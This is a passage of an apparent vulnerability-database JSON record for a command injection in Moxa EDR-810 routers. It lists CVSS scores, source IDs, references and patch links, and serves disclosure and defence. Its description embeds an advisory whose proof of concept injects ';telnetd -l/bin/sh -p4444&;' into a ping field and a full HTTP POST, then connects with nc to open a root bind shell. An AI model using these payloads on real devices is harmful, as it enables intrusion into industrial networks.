"db": "PACKETSTORM",
"id": "150535"
}
],
"trust": 0.1
},
"cve": "CVE-2017-12120",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-12120",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-11722",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-102611",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12120",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12120",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12120",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11722",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1633",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102611",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the \"/goform/net_WebPingGetValue\" URI to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa. \nMoxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities:\n\n#1 Authenticated OS Command Injection in web server ping functionality\n\nReserverd CVE ID: CVE-2018-19659\n\nA specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation required authentication. This is similar to CVE-2017-12120. \n\nProof-of-concept: \n1. Authenticate to Moxa NPort W2x50A device. \n2. Go to Main menu a System Management a Maintenance a Ping a Destination\n3. Enter ;telnetd -l/bin/sh -p4444\u0026;. in \u0027Destination\u0027 field\n4. Connect to opened bind shell: nc $IP_ADDRESS 4444\n\n #2 Authenticated OS Command Injection in web server wlan profile properties functionality\n\nReserverd CVE ID: CVE-2018-19660\n \nA specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation required authentication. \n\nProof-of-concept (sample HTTP request opening bind shell on port 4444):\n\nPOST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1\nHost: {IP:PORT}\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: SessionID={YOURSESSIONID}\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 309\n \nAuthentication=3\u0026EAP_method=1\u0026Username= ;telnetd -l/bin/sh -p4444\u0026;\n\nThese vulnerabilities were fixed in the firmware version 2.2 Build_18082311. \nhttps://www.moxa.com/support/download.aspx?type=support\u0026id=14781 \n\n\nBest regards,\nMaksim Khazov\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "PACKETSTORM",
"id": "150535"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12120",
"trust": 3.2
},
{
"db": "TALOS",
"id": "TALOS-2017-0472",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11722",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "150535",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-97231",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102611",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "PACKETSTORM",
"id": "150535"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"id": "VAR-201805-0120",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
}
]
},
"last_update_date": "2023-12-18T12:18:22.451000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Command Injection Vulnerability (CNVD-2018-11722)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132223"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190034"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0472"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12120"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12120"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0472"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19660"
},
{
"trust": 0.1,
"url": "https://www.moxa.com/support/download.aspx?type=support\u0026id=14781"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "PACKETSTORM",
"id": "150535"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "VULHUB",
"id": "VHN-102611"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "PACKETSTORM",
"id": "150535"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102611"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"date": "2018-11-29T23:44:44",
"db": "PACKETSTORM",
"id": "150535"
},
{
"date": "2018-05-14T20:29:00.203000",
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"date": "2022-12-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102611"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"date": "2022-12-14T15:41:38.967000",
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
],
"trust": 0.6
}
}